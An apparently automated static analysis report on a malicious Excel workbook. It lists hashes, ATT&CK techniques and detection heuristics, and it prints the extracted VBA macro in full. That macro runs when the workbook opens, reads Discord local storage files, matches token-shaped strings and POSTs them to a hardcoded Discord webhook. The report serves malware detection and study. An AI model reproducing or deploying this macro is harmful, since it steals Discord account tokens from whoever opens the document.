Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d3362a85182555aa…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 33.2 KB
Created: 2021-04-02 18:02:50 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2021-11-25
MD5: ca53d8a38685f6b5de48b5b03c15b0e1
SHA-1: 0a0f48bd120daf609e195ba595ba39e30779c92c
SHA-256: d3362a85182555aa958a14ac6ef6fb9842d4b8951bf697a84cc1747bbede7039
Risk Score: 166

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1041 Exfiltration Over C2 Channel

The sample is an Excel document containing a Workbook_Open VBA macro that executes when the workbook is opened. The macro uses VBA.CreateObject to instantiate an MSXML2.XMLHTTP object, reads the Discord client's local storage leveldb files from the user's APPDATA directory, and sends their content as JSON POST requests to the hardcoded webhook URL: https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim. The visible document body contains unrelated game strategy text, which is most likely a lure.

Heuristics (8)

  • VBA project inside OOXML (medium; 4 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro (high) [OLE_VBA_WBOPEN]
    Workbook_Open macro
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]
    Environ() call (env variable access)
  • External hyperlinks (6) (low) [OOXML_EXTERNAL_HYPERLINKS]
    Document contains 6 external hyperlinks — clickable URLs are stored as external relationships. First target: https://twitter.com/_kurako__/status/1446013883995410437?s=20
  • Hidden worksheet (hidden) (low) [OOXML_HIDDEN_SHEET]
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim (in document text: OOXML body / shared strings)
    • https://twitter.com/_kurako__/status/1446013883995410437?s=20 (document hyperlink)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4377 bytes
SHA-256: fca14a974bb3168e29fba961c8d5ea9a63fa0ff74d17c62d5c7f885f1670809a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ta_delovni_zvezek"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_open()
Dim msg As String
Dim fileName As Variant
fileName = Dir(Environ("APPDATA") & "\Discord\Local Storage\leveldb\*.ldb", vbNormal)
Const WEBHOOK_URL = "https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim"
Dim Xhr As Object  ' As MSXML2.XMLHTTP60
Set Xhr = VBA.CreateObject("MSXML2.XMLHTTP")

Worksheets("Troll").Visible = True
Worksheets("List1").Visible = False

msg = ""

Dim TextFile As Integer
Dim FilePath As String
Dim FileContent As String
Close TextFile


While fileName <> ""


    TextFile = FreeFile
    
    Open (Environ("APPDATA") & "\Discord\Local Storage\leveldb\") & fileName For Binary As TextFile
    FileContent = Input(LOF(TextFile), TextFile)
    msg = CleanS2XL(FileContent, "", False)
    Close TextFile
    fileName = Dir
    
    msg = trim(msg)

    'Put the regex here
    RegexMatchingAndDisplayingAPattern (msg)
    
Wend



With Xhr
        .Open "POST", WEBHOOK_URL, True
        .setRequestHeader "Content-Type", "application/json"
        .send "{""content"":""" & msg & """}"
    End With  'xhr


End Sub

Sub unbugger()
Debug.Print fileName
End Sub

Function CleanS2XL(ByVal Value As String, ReplaceWith, TrimResult) As String

Dim NonPrint() As Variant
Dim Counter As Long

CleanS2XL = Value

For Counter = 0 To 31
    CleanS2XL = Replace(CleanS2XL, Chr(Counter), ReplaceWith)
Next Counter

NonPrint = Array(127, 129, 141, 143, 144, 157)
For Counter = LBound(NonPrint) To UBound(NonPrint)
    CleanS2XL = Replace(CleanS2XL, Chr(NonPrint(Counter)), ReplaceWith)
Next Counter
CleanS2XL = Replace(CleanS2XL, Chr(160), Chr(32))
If TrimResult Then CleanS2XL = Application.trim(CleanS2XL)
End Function

Function SplitString(ByVal str As String, ByVal numOfChar As Long) As String()
    Dim sArr() As String
    Dim nCount As Long
    ReDim sArr((Len(str) - 1) \ numOfChar)
    Do While Len(str)
        sArr(nCount) = Left$(str, numOfChar)
        str = Mid$(str, numOfChar + 1)
        nCount = nCount + 1
    Loop
    SplitString = sArr
End Function

Sub RegexMatchingAndDisplayingAPattern(x)
Dim regexOne As Object
Set regexOne = New RegExp
Dim msg2 As String
msg2 = ""
'-
Dim Xhr As Object  ' As MSXML2.XMLHTTP60
Set Xhr = VBA.CreateObject("MSXML2.XMLHTTP")
Const WEBHOOK_URL = "https://discord.com/api/webhooks/827555600346644490/t8Ye6pcw6a7FVkTMEobXd1PpZNsvqZyvrAZ0wg43sRym7wc4yugPCw8eaBqwRgosLJim"
'-
regexOne.Pattern = "[\w-]{24}\.[\w-]{6}\.[\w-]{27}"
regexOne.Global = True
regexOne.IgnoreCase = IgnoreCase


Set theMatches = regexOne.Execute(x)

For Each Match In theMatches
  msg2 = msg2 & " " & Match.Value
  
Next Match

With Xhr
        .Open "POST", WEBHOOK_URL, True
        .setRequestHeader "Content-Type", "application/json"
        .send "{""content"":""" & msg2 & """}"
End With  'xhr



End Sub

Public Function testRange() As Range
    Set testRange = Range("A1")
End Function

Private Sub Workbook_BeforeClose(Cancel As Boolean)
Worksheets("List1").Visible = True
Worksheets("Troll").Visible = False

End Sub

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name =
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 32768 bytes
SHA-256: 4694c43712aea4a52bbacd303075d5829d1a6c180268938b98f85ccf04275a90